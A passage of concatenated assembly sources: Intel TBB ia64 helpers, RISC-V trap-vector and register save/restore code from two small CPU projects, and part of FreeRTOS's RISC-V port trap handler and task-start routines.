// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// RSE backing store pointer retrieval
.section .text
.align 16
.proc __TBB_get_bsp#
.global __TBB_get_bsp#
__TBB_get_bsp:
mov r8=ar.bsp
br.ret.sptk.many b0
.endp __TBB_get_bsp#
|
AIFM-sys/AIFM
| 1,704
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/pause.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
.section .text
.align 16
// void __TBB_machine_pause( long count );
// r32 = count
.proc __TBB_machine_pause#
.global __TBB_machine_pause#
count = r32
__TBB_machine_pause:
hint.m 0
add count=-1,count
;;
cmp.eq p6,p7=0,count
(p7) br.cond.dpnt __TBB_machine_pause
(p6) br.ret.sptk.many b0
.endp __TBB_machine_pause#
|
aignacio/riscv_verilator_model
| 4,012
|
sw/hello_world/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate space on the stack, we need to save the
# context of 16*32-bit registers what's equals to
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...and we deallocate space on the stack return
addi sp, sp, 64
# ing from the trap with mret
mret
.endm
.option norvc
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will go to jump on trap execution, in the code below we consider that
# vectored interrupt are actived (i.e MTVEC[1:0] = 1)
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j uart_trap
j gpio_trap
j trap_machine_external_int
j machine_timer_trap
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
_synctrap:
trap_entry
jal isr_synctrap
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
machine_timer_trap:
trap_entry
jal isr_m_timer
trap_exit
uart_trap:
trap_entry
jal isr_uart
trap_exit
gpio_trap:
trap_entry
jal isr_gpio
trap_exit
|
aignacio/riscv_verilator_model
| 3,868
|
sw/boot_rom/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate space on the stack, we need to save the
# context of 16*32-bit registers what's equals to
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...and we deallocate space on the stack return
addi sp, sp, 64
# ing from the trap with mret
mret
.endm
.option norvc
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will go to jump on trap execution, in the code below we consider that
# vectored interrupt are actived (i.e MTVEC[1:0] = 1)
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
_synctrap:
trap_entry
jal isr_synctrap
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
|
aignacio/nox
| 3,310
|
sw/hello_world/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate space on the stack, we need to save the
# context of 16*32-bit registers what's equals to
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...and we deallocate space on the stack return
addi sp, sp, 64
# ing from the trap with mret
mret
.endm
.option norvc
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will go to jump on trap execution, in the code below we consider that
# vectored interrupt are actived (i.e MTVEC[1:0] = 1)
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
nop
nop
j trap_machine_software_int # MTVEC = [Trap base] + 0x4*3 = 0x0C
nop
nop
nop
j trap_machine_timer_int # MTVEC = [Trap base] + 0x4*7 = 0x1C
nop
nop
nop
j trap_machine_external_int # MTVEC = [Trap base] + 0x4*11 = 0x2C
.align 2
_synctrap:
trap_entry
jal isr_synctrap
trap_exit
trap_machine_software_int:
trap_entry
jal isr_m_software
trap_exit
trap_machine_timer_int:
trap_entry
jal isr_m_timer
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
|
aignacio/nox
| 19,101
|
sw/libs/FreeRTOS-Kernel/portable/GCC/RISC-V/portASM.S
|
/*
* FreeRTOS Kernel V10.4.6
* Copyright (C) 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* SPDX-License-Identifier: MIT
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of
* this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to
* use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
* the Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
* https://www.FreeRTOS.org
* https://github.com/FreeRTOS
*
*/
/*
* The FreeRTOS kernel's RISC-V port is split between the the code that is
* common across all currently supported RISC-V chips (implementations of the
* RISC-V ISA), and code which tailors the port to a specific RISC-V chip:
*
* + The code that is common to all RISC-V chips is implemented in
* FreeRTOS\Source\portable\GCC\RISC-V-RV32\portASM.S. There is only one
* portASM.S file because the same file is used no matter which RISC-V chip is
* in use.
*
* + The code that tailors the kernel's RISC-V port to a specific RISC-V
* chip is implemented in freertos_risc_v_chip_specific_extensions.h. There
* is one freertos_risc_v_chip_specific_extensions.h that can be used with any
* RISC-V chip that both includes a standard CLINT and does not add to the
* base set of RISC-V registers. There are additional
* freertos_risc_v_chip_specific_extensions.h files for RISC-V implementations
* that do not include a standard CLINT or do add to the base set of RISC-V
* registers.
*
* CARE MUST BE TAKEN TO INCLDUE THE CORRECT
* freertos_risc_v_chip_specific_extensions.h HEADER FILE FOR THE CHIP
* IN USE. To include the correct freertos_risc_v_chip_specific_extensions.h
* header file ensure the path to the correct header file is in the assembler's
* include path.
*
* This freertos_risc_v_chip_specific_extensions.h is for use on RISC-V chips
* that include a standard CLINT and do not add to the base set of RISC-V
* registers.
*
*/
#if __riscv_xlen == 64
#define portWORD_SIZE 8
#define store_x sd
#define load_x ld
#elif __riscv_xlen == 32
#define store_x sw
#define load_x lw
#define portWORD_SIZE 4
#else
#error Assembler did not define __riscv_xlen
#endif
#include "freertos_risc_v_chip_specific_extensions.h"
/* Check the freertos_risc_v_chip_specific_extensions.h and/or command line
definitions. */
#if defined( portasmHAS_CLINT ) && defined( portasmHAS_MTIME )
#error The portasmHAS_CLINT constant has been deprecated. Please replace it with portasmHAS_MTIME. portasmHAS_CLINT and portasmHAS_MTIME cannot both be defined at once. See https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#endif
#ifdef portasmHAS_CLINT
#warning The portasmHAS_CLINT constant has been deprecated. Please replace it with portasmHAS_MTIME and portasmHAS_SIFIVE_CLINT. For now portasmHAS_MTIME and portasmHAS_SIFIVE_CLINT are derived from portasmHAS_CLINT. See https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#define portasmHAS_MTIME portasmHAS_CLINT
#define portasmHAS_SIFIVE_CLINT portasmHAS_CLINT
#endif
#ifndef portasmHAS_MTIME
#error freertos_risc_v_chip_specific_extensions.h must define portasmHAS_MTIME to either 1 (MTIME clock present) or 0 (MTIME clock not present). See https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#endif
#ifndef portasmHANDLE_INTERRUPT
#error portasmHANDLE_INTERRUPT must be defined to the function to be called to handle external/peripheral interrupts. portasmHANDLE_INTERRUPT can be defined on the assembler command line or in the appropriate freertos_risc_v_chip_specific_extensions.h header file. https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#endif
#ifndef portasmHAS_SIFIVE_CLINT
#define portasmHAS_SIFIVE_CLINT 0
#endif
/* Only the standard core registers are stored by default. Any additional
registers must be saved by the portasmSAVE_ADDITIONAL_REGISTERS and
portasmRESTORE_ADDITIONAL_REGISTERS macros - which can be defined in a chip
specific version of freertos_risc_v_chip_specific_extensions.h. See the notes
at the top of this file. */
#define portCONTEXT_SIZE ( 30 * portWORD_SIZE )
.global xPortStartFirstTask
.global freertos_risc_v_trap_handler
.global pxPortInitialiseStack
.extern pxCurrentTCB
.extern ulPortTrapHandler
.extern vTaskSwitchContext
.extern xTaskIncrementTick
.extern Timer_IRQHandler
.extern pullMachineTimerCompareRegister
.extern pullNextTime
.extern uxTimerIncrementsForOneTick /* size_t type so 32-bit on 32-bit core and 64-bits on 64-bit core. */
.extern xISRStackTop
.extern portasmHANDLE_INTERRUPT
/*-----------------------------------------------------------*/
.align 8
.func
freertos_risc_v_trap_handler:
addi sp, sp, -portCONTEXT_SIZE
store_x x1, 1 * portWORD_SIZE( sp )
store_x x5, 2 * portWORD_SIZE( sp )
store_x x6, 3 * portWORD_SIZE( sp )
store_x x7, 4 * portWORD_SIZE( sp )
store_x x8, 5 * portWORD_SIZE( sp )
store_x x9, 6 * portWORD_SIZE( sp )
store_x x10, 7 * portWORD_SIZE( sp )
store_x x11, 8 * portWORD_SIZE( sp )
store_x x12, 9 * portWORD_SIZE( sp )
store_x x13, 10 * portWORD_SIZE( sp )
store_x x14, 11 * portWORD_SIZE( sp )
store_x x15, 12 * portWORD_SIZE( sp )
store_x x16, 13 * portWORD_SIZE( sp )
store_x x17, 14 * portWORD_SIZE( sp )
store_x x18, 15 * portWORD_SIZE( sp )
store_x x19, 16 * portWORD_SIZE( sp )
store_x x20, 17 * portWORD_SIZE( sp )
store_x x21, 18 * portWORD_SIZE( sp )
store_x x22, 19 * portWORD_SIZE( sp )
store_x x23, 20 * portWORD_SIZE( sp )
store_x x24, 21 * portWORD_SIZE( sp )
store_x x25, 22 * portWORD_SIZE( sp )
store_x x26, 23 * portWORD_SIZE( sp )
store_x x27, 24 * portWORD_SIZE( sp )
store_x x28, 25 * portWORD_SIZE( sp )
store_x x29, 26 * portWORD_SIZE( sp )
store_x x30, 27 * portWORD_SIZE( sp )
store_x x31, 28 * portWORD_SIZE( sp )
csrr t0, mstatus /* Required for MPIE bit. */
store_x t0, 29 * portWORD_SIZE( sp )
portasmSAVE_ADDITIONAL_REGISTERS /* Defined in freertos_risc_v_chip_specific_extensions.h to save any registers unique to the RISC-V implementation. */
load_x t0, pxCurrentTCB /* Load pxCurrentTCB. */
store_x sp, 0( t0 ) /* Write sp to first TCB member. */
csrr a0, mcause
csrr a1, mepc
test_if_asynchronous:
srli a2, a0, __riscv_xlen - 1 /* MSB of mcause is 1 if handing an asynchronous interrupt - shift to LSB to clear other bits. */
beq a2, x0, handle_synchronous /* Branch past interrupt handing if not asynchronous. */
store_x a1, 0( sp ) /* Asynch so save unmodified exception return address. */
handle_asynchronous:
#if( portasmHAS_MTIME != 0 )
test_if_mtimer: /* If there is a CLINT then the mtimer is used to generate the tick interrupt. */
addi t0, x0, 1
slli t0, t0, __riscv_xlen - 1 /* LSB is already set, shift into MSB. Shift 31 on 32-bit or 63 on 64-bit cores. */
addi t1, t0, 7 /* 0x8000[]0007 == machine timer interrupt. */
bne a0, t1, test_if_external_interrupt
load_x t0, pullMachineTimerCompareRegister /* Load address of compare register into t0. */
load_x t1, pullNextTime /* Load the address of ullNextTime into t1. */
#if( __riscv_xlen == 32 )
/* Update the 64-bit mtimer compare match value in two 32-bit writes. */
li t4, -1
lw t2, 0(t1) /* Load the low word of ullNextTime into t2. */
lw t3, 4(t1) /* Load the high word of ullNextTime into t3. */
sw t4, 0(t0) /* Low word no smaller than old value to start with - will be overwritten below. */
sw t3, 4(t0) /* Store high word of ullNextTime into compare register. No smaller than new value. */
sw t2, 0(t0) /* Store low word of ullNextTime into compare register. */
lw t0, uxTimerIncrementsForOneTick /* Load the value of ullTimerIncrementForOneTick into t0 (could this be optimized by storing in an array next to pullNextTime?). */
add t4, t0, t2 /* Add the low word of ullNextTime to the timer increments for one tick (assumes timer increment for one tick fits in 32-bits). */
sltu t5, t4, t2 /* See if the sum of low words overflowed (what about the zero case?). */
add t6, t3, t5 /* Add overflow to high word of ullNextTime. */
sw t4, 0(t1) /* Store new low word of ullNextTime. */
sw t6, 4(t1) /* Store new high word of ullNextTime. */
#endif /* __riscv_xlen == 32 */
#if( __riscv_xlen == 64 )
/* Update the 64-bit mtimer compare match value. */
ld t2, 0(t1) /* Load ullNextTime into t2. */
sd t2, 0(t0) /* Store ullNextTime into compare register. */
ld t0, uxTimerIncrementsForOneTick /* Load the value of ullTimerIncrementForOneTick into t0 (could this be optimized by storing in an array next to pullNextTime?). */
add t4, t0, t2 /* Add ullNextTime to the timer increments for one tick. */
sd t4, 0(t1) /* Store ullNextTime. */
#endif /* __riscv_xlen == 64 */
load_x sp, xISRStackTop /* Switch to ISR stack before function call. */
jal xTaskIncrementTick
beqz a0, processed_source /* Don't switch context if incrementing tick didn't unblock a task. */
jal vTaskSwitchContext
j processed_source
test_if_external_interrupt: /* If there is a CLINT and the mtimer interrupt is not pending then check to see if an external interrupt is pending. */
addi t1, t1, 4 /* 0x80000007 + 4 = 0x8000000b == Machine external interrupt. */
bne a0, t1, as_yet_unhandled /* Something as yet unhandled. */
#endif /* portasmHAS_MTIME */
load_x sp, xISRStackTop /* Switch to ISR stack before function call. */
jal portasmHANDLE_INTERRUPT /* Jump to the interrupt handler if there is no CLINT or if there is a CLINT and it has been determined that an external interrupt is pending. */
j processed_source
handle_synchronous:
addi a1, a1, 4 /* Synchronous so updated exception return address to the instruction after the instruction that generated the exeption. */
store_x a1, 0( sp ) /* Save updated exception return address. */
test_if_environment_call:
li t0, 11 /* 11 == environment call. */
bne a0, t0, is_exception /* Not an M environment call, so some other exception. */
load_x sp, xISRStackTop /* Switch to ISR stack before function call. */
jal vTaskSwitchContext
j processed_source
is_exception:
csrr t0, mcause /* For viewing in the debugger only. */
csrr t1, mepc /* For viewing in the debugger only */
csrr t2, mstatus
j is_exception /* No other exceptions handled yet. */
as_yet_unhandled:
csrr t0, mcause /* For viewing in the debugger only. */
j as_yet_unhandled
processed_source:
load_x t1, pxCurrentTCB /* Load pxCurrentTCB. */
load_x sp, 0( t1 ) /* Read sp from first TCB member. */
/* Load mret with the address of the next instruction in the task to run next. */
load_x t0, 0( sp )
csrw mepc, t0
portasmRESTORE_ADDITIONAL_REGISTERS /* Defined in freertos_risc_v_chip_specific_extensions.h to restore any registers unique to the RISC-V implementation. */
/* Load mstatus with the interrupt enable bits used by the task. */
load_x t0, 29 * portWORD_SIZE( sp )
csrw mstatus, t0 /* Required for MPIE bit. */
load_x x1, 1 * portWORD_SIZE( sp )
load_x x5, 2 * portWORD_SIZE( sp ) /* t0 */
load_x x6, 3 * portWORD_SIZE( sp ) /* t1 */
load_x x7, 4 * portWORD_SIZE( sp ) /* t2 */
load_x x8, 5 * portWORD_SIZE( sp ) /* s0/fp */
load_x x9, 6 * portWORD_SIZE( sp ) /* s1 */
load_x x10, 7 * portWORD_SIZE( sp ) /* a0 */
load_x x11, 8 * portWORD_SIZE( sp ) /* a1 */
load_x x12, 9 * portWORD_SIZE( sp ) /* a2 */
load_x x13, 10 * portWORD_SIZE( sp ) /* a3 */
load_x x14, 11 * portWORD_SIZE( sp ) /* a4 */
load_x x15, 12 * portWORD_SIZE( sp ) /* a5 */
load_x x16, 13 * portWORD_SIZE( sp ) /* a6 */
load_x x17, 14 * portWORD_SIZE( sp ) /* a7 */
load_x x18, 15 * portWORD_SIZE( sp ) /* s2 */
load_x x19, 16 * portWORD_SIZE( sp ) /* s3 */
load_x x20, 17 * portWORD_SIZE( sp ) /* s4 */
load_x x21, 18 * portWORD_SIZE( sp ) /* s5 */
load_x x22, 19 * portWORD_SIZE( sp ) /* s6 */
load_x x23, 20 * portWORD_SIZE( sp ) /* s7 */
load_x x24, 21 * portWORD_SIZE( sp ) /* s8 */
load_x x25, 22 * portWORD_SIZE( sp ) /* s9 */
load_x x26, 23 * portWORD_SIZE( sp ) /* s10 */
load_x x27, 24 * portWORD_SIZE( sp ) /* s11 */
load_x x28, 25 * portWORD_SIZE( sp ) /* t3 */
load_x x29, 26 * portWORD_SIZE( sp ) /* t4 */
load_x x30, 27 * portWORD_SIZE( sp ) /* t5 */
load_x x31, 28 * portWORD_SIZE( sp ) /* t6 */
addi sp, sp, portCONTEXT_SIZE
mret
.endfunc
/*-----------------------------------------------------------*/
.align 8
.func
xPortStartFirstTask:
#if( portasmHAS_SIFIVE_CLINT != 0 )
/* If there is a clint then interrupts can branch directly to the FreeRTOS
trap handler. Otherwise the interrupt controller will need to be configured
outside of this file. */
la t0, freertos_risc_v_trap_handler
csrw mtvec, t0
#endif /* portasmHAS_CLILNT */
load_x sp, pxCurrentTCB /* Load pxCurrentTCB. */
load_x sp, 0( sp ) /* Read sp from first TCB member. */
load_x x1, 0( sp ) /* Note for starting the scheduler the exception return address is used as the function return address. */
portasmRESTORE_ADDITIONAL_REGISTERS /* Defined in freertos_risc_v_chip_specific_extensions.h to restore any registers unique to the RISC-V implementation. */
load_x x6, 3 * portWORD_SIZE( sp ) /* t1 */
load_x x7, 4 * portWORD_SIZE( sp ) /* t2 */
load_x x8, 5 * portWORD_SIZE( sp ) /* s0/fp */
load_x x9, 6 * portWORD_SIZE( sp ) /* s1 */
load_x x10, 7 * portWORD_SIZE( sp ) /* a0 */
load_x x11, 8 * portWORD_SIZE( sp ) /* a1 */
load_x x12, 9 * portWORD_SIZE( sp ) /* a2 */
load_x x13, 10 * portWORD_SIZE( sp ) /* a3 */
load_x x14, 11 * portWORD_SIZE( sp ) /* a4 */
load_x x15, 12 * portWORD_SIZE( sp ) /* a5 */
load_x x16, 13 * portWORD_SIZE( sp ) /* a6 */
load_x x17, 14 * portWORD_SIZE( sp ) /* a7 */
load_x x18, 15 * portWORD_SIZE( sp ) /* s2 */
load_x x19, 16 * portWORD_SIZE( sp ) /* s3 */
load_x x20, 17 * portWORD_SIZE( sp ) /* s4 */
load_x x21, 18 * portWORD_SIZE( sp ) /* s5 */
load_x x22, 19 * portWORD_SIZE( sp ) /* s6 */
load_x x23, 20 * portWORD_SIZE( sp ) /* s7 */
load_x x24, 21 * portWORD_SIZE( sp ) /* s8 */
load_x x25, 22 * portWORD_SIZE( sp ) /* s9 */
load_x x26, 23 * portWORD_SIZE( sp ) /* s10 */
load_x x27, 24 * portWORD_SIZE( sp ) /* s11 */
load_x x28, 25 * portWORD_SIZE( sp ) /* t3 */
load_x x29, 26 * portWORD_SIZE( sp ) /* t4 */
load_x x30, 27 * portWORD_SIZE( sp ) /* t5 */
load_x x31, 28 * portWORD_SIZE( sp ) /* t6 */
load_x x5, 29 * portWORD_SIZE( sp ) /* Initial mstatus into x5 (t0) */
addi x5, x5, 0x08 /* Set MIE bit so the first task starts with interrupts enabled - required as returns with ret not eret. */
csrrw x0, mstatus, x5 /* Interrupts enabled from here! */
load_x x5, 2 * portWORD_SIZE( sp ) /* Initial x5 (t0) value. */
addi sp, sp, portCONTEXT_SIZE
ret
.endfunc
/*-----------------------------------------------------------*/
/*
* Unlike other ports pxPortInitialiseStack() is written in assembly code as it
* needs access to the portasmADDITIONAL_CONTEXT_SIZE constant. The prototype
* for the function is as per the other ports:
* StackType_t *pxPortInitialiseStack( StackType_t *pxTopOfStack, TaskFunction_t pxCode, void *pvParameters );
*
* As per the standard RISC-V ABI pxTopcOfStack is passed in in a0, pxCode in
* a1, and pvParameters in a2. The new top of stack is passed out in a0.
*
* RISC-V maps registers to ABI names as follows (X1 to X31 integer registers
* for the 'I' profile, X1 to X15 for the 'E' profile, currently I assumed).
*
* Register ABI Name Description Saver
* x0 zero Hard-wired zero -
* x1 ra Return address Caller
* x2 sp Stack pointer Callee
* x3 gp Global pointer -
* x4 tp Thread pointer -
* x5-7 t0-2 Temporaries Caller
* x8 s0/fp Saved register/Frame pointer Callee
* x9 s1 Saved register Callee
* x10-11 a0-1 Function Arguments/return values Caller
* x12-17 a2-7 Function arguments Caller
* x18-27 s2-11 Saved registers Callee
* x28-31 t3-6 Temporaries Caller
*
* The RISC-V context is saved t FreeRTOS tasks in the following stack frame,
* where the global and thread pointers are currently assumed to be constant so
* are not saved:
*
* mstatus
* x31
* x30
* x29
* x28
* x27
* x26
* x25
* x24
* x23
* x22
* x21
* x20
* x19
* x18
* x17
* x16
* x15
* x14
* x13
* x12
* x11
* pvParameters
* x9
* x8
* x7
* x6
* x5
* portTASK_RETURN_ADDRESS
* [chip specific registers go here]
* pxCode
*/
.align 8
.func
pxPortInitialiseStack:
csrr t0, mstatus /* Obtain current mstatus value. */
andi t0, t0, ~0x8 /* Ensure interrupts are disabled when the stack is restored within an ISR. Required when a task is created after the schedulre has been started, otherwise interrupts would be disabled anyway. */
addi t1, x0, 0x188 /* Generate the value 0x1880, which are the MPIE and MPP bits to set in mstatus. */
slli t1, t1, 4
or t0, t0, t1 /* Set MPIE and MPP bits in mstatus value. */
addi a0, a0, -portWORD_SIZE
store_x t0, 0(a0) /* mstatus onto the stack. */
